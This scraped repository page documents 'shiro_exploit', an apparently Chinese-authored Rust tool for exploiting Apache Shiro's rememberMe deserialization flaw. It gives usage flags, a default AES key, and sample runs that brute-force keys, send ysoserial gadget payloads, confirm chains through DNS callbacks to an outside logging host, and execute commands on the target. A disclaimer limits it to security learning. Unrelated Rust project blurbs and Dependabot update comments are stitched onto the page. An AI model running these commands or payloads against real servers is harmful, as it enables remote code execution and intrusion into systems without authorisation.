apache-shiro-exploit

Overview

郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。

使用方法

~ shiro_exploit --help
Usage: shiro_exploit [--key <key>] [-m <mode>] [-t <target>] [-s <ser>] [--file <file>] [--keys <keys>] [--csv <csv>] [--proxy <proxy>] [--timeout <timeout>] [--thread <thread>] [--chain] [--exploit] [--dns <dns>] [-p <payload>] [-c <command>] [--echo-name <echo-name>] [--command-name <command-name>] [-l]

shiro_exploit

Options:
  --key             you can specify known keys
  -m, --mode        apache-shiro encryption algorithm,default: CBC
  -t, --target      the target
  -s, --ser         serialize file
  --file            read the target from the file
  --keys            read the key from the file
  --csv             export to the csv file
  --proxy           proxy to use for requests
                    (ex:[http(s)|socks5(h)]://host:port)
  --timeout         set request timeout
  --thread          number of concurrent threads
  --chain           enum chain mode
  --exploit         exploit mode
  --dns             dns identifier, default: 981tzg.ceye.io
  -p, --payload     select a payload
  -c, --command     command to execute
  --echo-name       tomcat echo request header name
  --command-name    tomcat command request header name
  -l, --list        list all payload
  --help            display usage information

详细参数

  • --key指定Key,默认kPH+bIxk5D2deZiIxcaaaA==
  • -m指定加密模式,默认CBC,可选:GCM
  • -t单个目标
  • -s读入ysoserial生成的文件作为payload
  • --file从文件读入目标
  • --keys从文件读入key
  • --csv导出到csv文件
  • --exploit利用模式,爆破出key后,如果开启exploit模式会读入ysoserial生成的文件作为payload,如果--ser 参数为空,则为--dns作为URL_DNS的参数生成payload
  • --dns验证的DNS服务器,请求为目标的主机名_端口.你的DNS记录服务器,默认为981tzg.ceye.io
  • -p使用内置payload,配合-c或者--dns--echo-name--command-name,tomcat回显后面再更新
  • -l列出内置payload
  • --chain枚举利用链,结果查看DNS记录服务,前缀就是利用链名称。

使用ysoserial文件

~ shiro_exploit -t http://127.0.0.1:8080 --exploit --ser /home/kali-team/1.ser                 
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url                                                                     | method | verify | mode | key                      |
+=========================================================================+========+========+======+==========================+
| http://127.0.0.1:8080/login;jsessionid=EAEAD8C3FA8884D816F575E55B654694 | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+

使用DNS记录验证漏洞

~ shiro_exploit -t http://127.0.0.1:8080 --exploit --dns 981tzg.ceye.io
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url                                                                     | method | verify | mode | key                      |
+=========================================================================+========+========+======+==========================+
| http://127.0.0.1:8080/login;jsessionid=E01994D45911DE55FCE6606CFFF48AC7 | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+

爆破利用链

  • 主要利用ping命令带上利用链名称拼接到DNS前缀,如果能在DNS记录中看到说明可以使用该利用链
~ shiro_exploit -t http://127.0.0.1:8080 --exploit --dns 981tzg.ceye.io --chain
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url                                                                     | method | verify | mode | key                      |
+=========================================================================+========+========+======+==========================+
| http://127.0.0.1:8080/login;jsessionid=E01994D45911DE55FCE6606CFFF48AC7 | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
  • 查看DNS记录得到可用利用链,说明bs1,cck3,cc5,cc7,cck1cc6利用链可用
969227011	bs1.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:20
969226980	bs1.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:19
969226976	ccK3.127.0.0.1.8080.981tZG.cEYE.Io	127.0.0.1	2022-12-22 13:48:19
969226947	cc5.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:18
969226945	cc7.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:18
969226936	cCK3.127.0.0.1.8080.981tzg.ceyE.iO	127.0.0.1	2022-12-22 13:48:18
969226932	cck1.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:18
969226818	cc6.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:14

使用内置ysoserial

~ shiro_exploit -t http://127.0.0.1:8080 --exploit -p cck1 -c "ping qq.com"                                    
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
| url                                                                     | method | verify | mode | key                      |
+=========================================================================+========+========+======+==========================+
| http://127.0.0.1:8080/login;jsessionid=5FAF1087D2448C017C2959B2AC02CDAF | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
+-------------------------------------------------------------------------+--------+--------+------+--------------------------+
You might also like...
Tantivy is a full-text search engine library inspired by Apache Lucene and written in Rust
Tantivy is a full-text search engine library inspired by Apache Lucene and written in Rust

Tantivy is a full text search engine library written in Rust. It is closer to Apache Lucene than to Elasticsearch or Apache Solr in the sense it is no

Apache Arrow in WebAssembly

WASM Arrow This package compiles the Rust library of Apache Arrow to WebAssembly. This might be a viable alternative to the pure JavaScript library. R

Distributed compute platform implemented in Rust, and powered by Apache Arrow.
Distributed compute platform implemented in Rust, and powered by Apache Arrow.

Ballista: Distributed Compute Platform Overview Ballista is a distributed compute platform primarily implemented in Rust, powered by Apache Arrow. It

A Rust DataFrame implementation, built on Apache Arrow

Rust DataFrame A dataframe implementation in Rust, powered by Apache Arrow. What is a dataframe? A dataframe is a 2-dimensional tabular data structure

Official Rust implementation of Apache Arrow

Native Rust implementation of Apache Arrow Welcome to the implementation of Arrow, the popular in-memory columnar format, in Rust. This part of the Ar

Apache Arrow DataFusion and Ballista query engines
Apache Arrow DataFusion and Ballista query engines

DataFusion is an extensible query execution framework, written in Rust, that uses Apache Arrow as its in-memory format.

Apache TinkerPop from Rust via Rucaja (JNI)

Apache TinkerPop from Rust An example showing how to call Apache TinkerPop from Rust via Rucaja (JNI). This repository contains two directories: java

librdkafka - the Apache Kafka C/C++ client library

librdkafka - the Apache Kafka C/C++ client library Copyright (c) 2012-2020, Magnus Edenhill. https://github.com/edenhill/librdkafka librdkafka is a C

Fill Apache Arrow record batches from an ODBC data source in Rust.

arrow-odbc Fill Apache Arrow arrays from ODBC data sources. This crate is build on top of the arrow and odbc-api crate and enables you to read the dat

Generated Ryst of Apache Arrow spec

Arrow generated IPC format The generated flatbuffers code for Rust. Note that these files suffered modifications because flatbuffers is unable to comp

An experimental implementation of Arc against Apache Datafusion

box This is an experimental repository to perform a proof of concept replacement of the Apache Spark executor for Arc with Apache DataFusion. This is

Rust client for apache iotdb.

Apache IoTDB Apache IoTDB (Database for Internet of Things) is an IoT native database with high performance for data management and analysis, deployab

Rust client for apache iotdb.

Apache IoTDB Apache IoTDB (Database for Internet of Things) is an IoT native database with high performance for data management and analysis, deployab

BLS12-381 cryptography using Apache Milagro

BLS12-381 Aggregate Signatures in Rust using Apache Milagro WARNING: This library is a work in progress and has not been audited. Do NOT consider the

A new arguably faster implementation of Apache Spark from scratch in Rust

vega Previously known as native_spark. Documentation A new, arguably faster, implementation of Apache Spark from scratch in Rust. WIP Framework tested

Apache Arrow is a multi-language toolbox for accelerated data interchange and in-memory processing

Apache Arrow Powering In-Memory Analytics Apache Arrow is a development platform for in-memory analytics. It contains a set of technologies that enabl

Rust-based WebAssembly bindings to read and write Apache Parquet files

parquet-wasm WebAssembly bindings to read and write the Parquet format to Apache Arrow. This is designed to be used alongside a JavaScript Arrow imple

Arrowdantic is a small Python library backed by a mature Rust implementation of Apache Arrow

Welcome to arrowdantic Arrowdantic is a small Python library backed by a mature Rust implementation of Apache Arrow that can interoperate with Parquet

Tantivy is a full-text search engine library inspired by Apache Lucene and written in Rust
Tantivy is a full-text search engine library inspired by Apache Lucene and written in Rust

Tantivy is a full-text search engine library written in Rust. It is closer to Apache Lucene than to Elasticsearch or Apache Solr in the sense it is no

Comments
  • Update prettytable-rs requirement from 0.9.0 to 0.10.0

    Update prettytable-rs requirement from 0.9.0 to 0.10.0

    Updates the requirements on prettytable-rs to permit the latest version.

    Release notes

    Sourced from prettytable-rs's releases.

    v0.10.0

    Fixed

    • Fix panic due to incorrect ANSI escape handling #137
    • Fix display of empty tables #127

    Changed

    • Remove the unsafe code in Table::as_ref #146
    • Switch atty to is-terminal #151
    • Minimal Supported Rust Version bumped to 1.56

    Thanks

    Changelog

    Sourced from prettytable-rs's changelog.

    0.10.0 (2022-12-27)

    Fixed

    • Fix panic due to incorrect ANSI escape handling (#137)
    • Fix display of empty tables (#127)

    Changed

    • Remove the unsafe code in Table::as_ref (#146)
    • Switch atty to is-terminal (#151)
    • Minimal Supported Rust Version bumped to 1.56

    Thanks

    #127: phsym/prettytable-rs#127 #137: phsym/prettytable-rs#137 #145: phsym/prettytable-rs#145 #146: phsym/prettytable-rs#146 #151: phsym/prettytable-rs#151

    Commits

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies 
    opened by dependabot[bot] 0
  • Update select requirement from 0.5.0 to 0.6.0

    Update select requirement from 0.5.0 to 0.6.0

    Updates the requirements on select to permit the latest version.

    Commits
    • 32b3b25 0.6.0
    • e07725c upgrade to actions/checkout@v3 and switch to dtolnay/rust-toolchain
    • 3c8485e Merge pull request #72 from phimuemue/debug_impl
    • 909a4d8 remove the notice from readme
    • 6566da9 undo the recently made breaking changes in 0.6.0-alpha.1
    • df624f5 Merge pull request #73 from Billy-Sheppard/updated-deps
    • 8755d6d edition 2021
    • 59e8734 updated deps
    • b13ba72 warn about missing Debug implementations
    • 1fb7bc8 impl Debug for Iter
    • Additional commits viewable in compare view

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies 
    opened by dependabot[bot] 0
  • Update uuid requirement from 0.8 to 1.2

    Update uuid requirement from 0.8 to 1.2

    Updates the requirements on uuid to permit the latest version.

    Release notes

    Sourced from uuid's releases.

    1.2.2

    What's Changed

    Full Changelog: https://github.com/uuid-rs/uuid/compare/1.2.1...1.2.2

    Commits
    • 60ca9af Merge pull request #646 from uuid-rs/cargo/1.2.2
    • d413ed6 prepare for 1.2.2 release
    • ce445a2 Merge pull request #645 from uuid-rs/fix/extern-alloc
    • b7c845f remove extern crate alloc
    • f5a29cf Merge pull request #640 from uuid-rs/ci/cleanups
    • 876e466 remove missing moniker from job names
    • 6944c0d simplify CI and unpin arbitrary
    • b87760d Merge pull request #637 from KodrAus/cargo/1.2.1
    • b21f0cb prepare for 1.2.1 release
    • cac99f5 Merge pull request #636 from KodrAus/fix/v1-breakage
    • Additional commits viewable in compare view

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies 
    opened by dependabot[bot] 0
Owner
EMOCAT
三米前有蕉皮用rust开发的小工具
EMOCAT
zkPoEX enables white hat hackers to report live vulnerabilities in smart contracts while maintaining the confidentiality of the exploit

zkPoEX enables white hat hackers to report live vulnerabilities in smart contracts while maintaining the confidentiality of the exploit, facilitating efficient communication and collaboration between hackers and project owners for a more secure DeFi ecosystem.

zkoranges 135 Apr 16, 2023
Write your own exploit for $CASH

Cashio Exploit Workshop The Cashio hack was one of the biggest hacks occurred in Solana ecosystem which allowed the attacker to print infinite amount

Narya.ai 21 Mar 22, 2023
A cross platform, rust implementation for the Tegra X1 bootROM exploit

Switcheroo A CLI and GUI for the RCM BootRom exploit (Fusée Gelée exploit for Nintendo Switch) Only works on unpatched Switches: https://ismyswitchpat

Ethan Budd 35 Nov 5, 2022
An exploit for CVE-2012-2982 implemented in Rust

This PoC exploit for CVE-2012-2982 was written as an exercise for the "Intro to PoC scripting" Room on TryHackMe. The room can be found here: https://

Zach (Tas) 2 Dec 18, 2022
zkPoEX enables white hat hackers to report live vulnerabilities in smart contracts while maintaining the confidentiality of the exploit

zkPoEX enables white hat hackers to report live vulnerabilities in smart contracts while maintaining the confidentiality of the exploit, facilitating efficient communication and collaboration between hackers and project owners for a more secure DeFi ecosystem.

zkoranges 135 Apr 16, 2023
💔 Heartbleed vulnerability exploit written in Rust

Heartbleed ?? Heartbleed vulnerability exploit written in Rust What is it Heartbleed is a buffer over-read vulnerability in outdated versions of OpenS

Gianmatteo Palmieri 4 May 23, 2023
Write your own exploit for $CASH

Cashio Exploit Workshop The Cashio hack was one of the biggest hacks occurred in Solana ecosystem which allowed the attacker to print infinite amount

Narya.ai 21 Mar 22, 2023
Distributed compute platform implemented in Rust, and powered by Apache Arrow.

Ballista: Distributed Compute Platform Overview Ballista is a distributed compute platform primarily implemented in Rust, powered by Apache Arrow. It

Ballista 2.3k Jan 3, 2023
Pure Rust library for Apache ZooKeeper built on MIO

rust-zookeeper Zookeeper client written 100% in Rust This library is intended to be equivalent with the official (low-level) ZooKeeper client which sh

Nándor István Krácser 168 Dec 25, 2022
Rust client for Apache Kafka

Kafka Rust Client Project Status This project is starting to be maintained by John Ward, the current status is that I am bringing the project up to da

Yousuf Fauzan 902 Jan 2, 2023